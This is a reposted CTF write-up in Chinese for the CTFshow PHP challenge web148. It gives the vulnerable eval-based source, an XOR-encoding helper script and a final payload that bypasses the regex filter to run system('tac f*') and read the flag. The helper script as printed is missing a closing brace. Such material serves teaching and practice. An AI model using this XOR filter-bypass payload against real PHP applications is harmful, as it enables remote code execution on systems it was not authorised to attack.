CTFshow php特性 web148
生活随笔
收集整理的這篇文章主要介紹了
CTFshow php特性 web148
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
目錄
- 源碼
- 思路
- 題解
- 總結
源碼
<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-19 03:52:11*/include 'flag.php'; if(isset($_GET['code'])){$code=$_GET['code'];if(preg_match("/[A-Za-z0-9_\%\\|\~\'\,\.\:\@\&\*\+\- ]+/",$code)){die("error");}@eval($code); } else{highlight_file(__FILE__); }function get_ctfshow_fl0g(){echo file_get_contents("flag.php"); }思路
發現沒有過濾括號和^,直接異或就好了
異或
<?php highlight_file(__FILE__); $a = $_GET['a']; for ($i = 0; $i < strlen($a); $i++) {echo "%".dechex(ord($a[$i])^0xff); } echo "^"; for ($i = 0; $i < strlen($a); $i++) {echo "%ff";題解
(‘system’)(‘tac f*’)
code=(%8c%86%8c%8b%9a%92^%ff%ff%ff%ff%ff%ff)(%8b%9e%9c%df%99%d5^%ff%ff%ff%ff%ff%ff);總結
水題
總結
以上是生活随笔為你收集整理的CTFshow php特性 web148的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTFshow php特性 web147
- 下一篇: CTFshow php特性 web149